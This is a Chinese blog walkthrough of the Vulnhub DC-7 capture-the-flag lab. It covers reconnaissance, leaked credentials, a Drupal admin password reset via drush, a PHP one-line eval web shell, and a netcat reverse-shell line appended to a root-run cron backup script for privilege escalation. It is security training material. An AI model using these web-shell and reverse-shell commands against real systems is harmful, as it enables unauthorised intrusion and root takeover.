【Vulnhub靶机】DC-7

已于 2023-11-25 12:56:00 修改
阅读量569 收藏 2
点赞数 1
分类专栏: # 靶机系列 文章标签: 网络安全 靶机 kali
于 2023-08-09 20:02:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/132196416
版权

文章目录

DC-7靶机地址

image-20230808204245221

同样的,把靶机跟kali放在同一网段,(NAT模式)

主机发现

arp-scan -l

image-20230808204710235

端口扫描

nmap -A -T4 -p- 192.168.80.139

image-20230808204838597

22端口开始,80端口开启

浏览器先访问一下靶机的80端口

image-20230808205223470

熟悉的Drupal站点

先爆破一下目录看看

dirsearch -u 192.168.80.139 -i 200

image-20230808205712637

进到 /usr/login目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名

image-20230808205800137

DC-7首页也提示说:暴力或字典攻击,你可能不会成功,跳出框框思考,就需要从其他方向找突破口了。。。。

image-20230808210017690

用谷歌浏览器搜索一下Dc7User这么个关键词,发现有一个github

image-20230808211151203

进到 Dc7Usergithub里面,寻找,在一个config.php文件里出现用户名和密码这样的敏感信息

image-20230808211633738

$username = "dc7user";
$password = "MdR3xOgB7#dW";

尝试去网站里登录,结果报错

image-20230808211832025

那就再试试ssh登录,成功进入!!!

image-20230808211943245

查看都有什么文件 ,使用命令ls

image-20230808212239648

进入backups目录里,发现都是看不懂的,搜了一下gpg后缀格式,发现是一种加密的文件格式

image-20230808213123139

image-20230808212323437

再去看看mbox文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,

一个以root权限定期执行的备份任务,执行文件/opt/scripts/backups.sh

image-20230808212220436

使用cd命令切换到/opt/scripts/下看看

提示说cd /vat/www/html下,执行drush 命令

image-20230808212708654

查看backups.sh的权限,发现所有人都可以执行此文件

image-20230808214407873

drush即drupal shell,用于管理和操作drupal站点,可以用来修改管理员密码

Drush是Drupal的一个命令行shell和脚本接口

drush user-password admin --password="123456"  #修改密码

image-20230808215107935

账户admin密码123,登录成功!!!!!!!!!

image-20230808215304909

点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话木马,发现Drupal 8版本以后为了安全需要将php单独作为一个模块导入;需要去扩展里下载安装

image-20230808215839662

image-20230808215843571

URL的形式安装php8 https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20230808220232587

image-20230808220101555

image-20230808221021740

Extend里的List里,往下滑动,找PHP有关的,勾选上PHP Filter往下滑有个install

image-20230808221001333

安装完成!!!

image-20230808221058719

然后来到Content写一个一句话木马

<?php eval(@$_POST['password']);?>

在这里插入图片描述

image-20230808221341600

打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置

image-20230808221523643

在这里插入图片描述

蚁剑 测试连通性

在这里插入图片描述

kali开启监听

nc -lvvp 8989

image-20230808222034497

当前还只是普通用户,并没有管理员权限

在这里插入图片描述

进入交互shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20230808222532990

在新开的终端监听4444端口

image-20230808223046525

反弹shell到bashups.sh

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.80.141 4444 >/tmp/f" >> backups.sh

image-20230808223301341

等待计划任务执行,等等等…

image-20230809171557884

进到root家目录查看最终flag

image-20230809171701261

Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5049
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
vulnhub靶机DC-1
cyzCc的博客
02-15 1025
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 503
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
Vulnhub靶场 | DC系列 - DC7
最新发布
哦 卷!
08-31 836
对于当前的dc7user用户来说没有写权限,如果想再该脚本中写入代码,需要是root用户或者属于www-data组。靶机的信息告诉我们跳出思维惯性,页面的最先面有一个@DC7USER,既然是@开头,大概率是某个账号信息。其中 drush 命令,是为了管理drupal网站的工具。发现robots.txt文件,这也是web中的比较重要的敏感文件。看一下自己的sudo授权,提示没有该命令,但是有个新邮件。有上传图片的位置,尝试下图片马,很不幸失败了~直接将马写在文章中,不行,直接原样输出了。
vulnhubDC7靶机
LainWith的博客
02-14 1515
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
VulnHub DC7
baynk的博客
05-21 350
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-7,356/ 下载地址2:https://pan.baidu.com/s/1xua7BTO8If5zLua8dQMryA 提取码: dd83 只有一个flag,同时给了提示,不要去使用暴力破解。 这次地址都给了,真好,开肝。 0x02 渗透流程 nmap走起 还是先走80端口 熟悉的界面,好像是dc1使用的Drupal CMS,翻出第一关的页面进行对比 常规思路测试了好一会不一样的地方,逻辑漏洞,搜
VulnHubDC-7
weixin_39219503的博客
02-02 525
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机DC系列-DC-3.2
m0_54525483的博客
12-31 1237
Vulnhub靶机DC系列-DC-3.2 靶场名称:DC-2 下载地址: DC-3-2.zip (Size: 1005 MB) Download: http://www.five86.com/downloads/DC-3-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent ( Ma
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2557
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机 DC-7
菜浪马废的博客
03-31 359
最近太颓废了,没啥学习效率,多好的时间段啊,这疫情,这大假期,学学习考个证,他不香么 插旗:10天弄完大佬推荐的所有靶机!加油! 上来先用nmap扫一下 nmap -sP 192.168.0.0/24 nmap -sV 192.168.0.133 80端口开着 访问主页 cms是Drupal 好熟悉啊 上一个也是 这都是之前的啊 感觉都类似 不让爆破,在盒子之外什么鬼的 footer处有D...
靶机DC-7
weixin_43940853的博客
12-09 345
kali : 192.168.230.233 靶机 : 192.168.230.235 扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来 打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功 先进入了一个目录,查看文件后发现都是乱码 把目标放在mbox上 关注到邮件的Subj...
DC7-靶机
Au
11-30 1693
下载地址 下面是作者的一些提示,和爆破无关,需要Google~~~ 配置的环境: kali:192.168.25.131 DC7-靶机kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.128,判定为DC7-靶机,继续使用nmap获取详细信息...
DC-7靶机
Flamingo1998的博客
07-17 152
DC-7靶机
vulnhub靶场之DC-7
qq_58091216的博客
01-13 979
发现Content里面可以编辑文章,依次点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话,但发现Drupal 8后为了安全需要将php单独作为一个模块导入;但是如果我们获得了www-data的shell 那就可以写点东西进去,然后依靠计划任务,用root去运行,那么我们可以获得了root权限的shell了。查看下权限什么的,发现www-data拥有执行和写的权限,我们当前权限没有写权限,看来没办法动手脚了。
Vulnhub系列--DC7
qq_33775686的博客
05-31 423
知识点: netdiscover nmap droopescan PHP Filter 反弹shell (bin shell 、MSF shell) 提权
Vulnhub靶机DC系列-DC-7
m0_54525483的博客
01-07 1416
Vulnhub靶机DC系列-DC-7 靶场名称:DC-7 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ 下载地址: ** DC-7.zip (Size: 939 MB) Download: http://www.five86.com/downloads/DC-7.zip Download (Mirror): https://download.vulnhub.com/dc/DC-7.zip Download (Torrent): https://download.v
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值